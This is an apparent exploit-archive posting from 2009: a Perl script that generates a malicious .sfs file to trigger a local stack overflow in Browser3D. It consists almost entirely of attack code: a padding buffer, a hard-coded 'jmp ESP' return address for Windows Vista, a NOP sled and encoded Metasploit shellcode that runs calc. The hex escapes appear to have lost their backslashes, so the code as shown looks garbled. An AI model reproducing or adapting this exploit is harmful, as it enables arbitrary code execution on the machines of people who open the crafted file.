browser3dsfs-overflow.txt
Posted on 23 January 2009
#!/usr/bin/perl # By ALpHaNiX # NullArea.Net # THanks system("color 5"); if (@ARGV != 1) { &help; exit(); } sub help(){ print "[X] Usage : ./exploit.pl filename "; } { $file = $ARGV[0]; } print " [X]************************************************* "; print " [X]Browser3D(.sfs file) Local Stack Overflow Exploit* "; print " [X] Coded By AlpHaNiX * "; print " [X] From Null Area [NullArea.Net] * "; print " [X]************************************************** "; print "[+] Exploiting..... " ; my $acc="x41" x 300 ; # win32_exec - EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com my $shellcode = "x2bxc9x83xe9xdexd9xeexd9x74x24xf4x5bx81x73x13x5d". "x7exf1x8cx83xebxfcxe2xf4xa1x96xb5x8cx5dx7ex7axc9". "x61xf5x8dx89x25x7fx1ex07x12x66x7axd3x7dx7fx1axc5". "xd6x4ax7ax8dxb3x4fx31x15xf1xfax31xf8x5axbfx3bx81". "x5cxbcx1ax78x66x2axd5x88x28x9bx7axd3x79x7fx1axea". "xd6x72xbax07x02x62xf0x67xd6x62x7ax8dxb6xf7xadxa8". "x59xbdxc0x4cx39xf5xb1xbcxd8xbex89x80xd6x3exfdx07". "x2dx62x5cx07x35x76x1ax85xd6xfex41x8cx5dx7ex7axe4". "x61x21xc0x7ax3dx28x78x74xdexbex8axdcx35x8ex7bx88". "x02x16x69x72xd7x70xa6x73xbax1dx90xe0x3ex7exf1x8c"; my $ret ="x1ax0fx46x77" ; # jmp ESP in Windows VISTA my $nop ="x90" x 20 ;# some lame nops lol my $exploit = $acc.$ret.$nop.$shellcode; print "[+] Creating Evil File" ; open($FILE, ">>$file") or die "Cannot open $file"; print $FILE $exploit; close($FILE); print " [+] Please wait while creating $file"; print " [+] $file has been created";
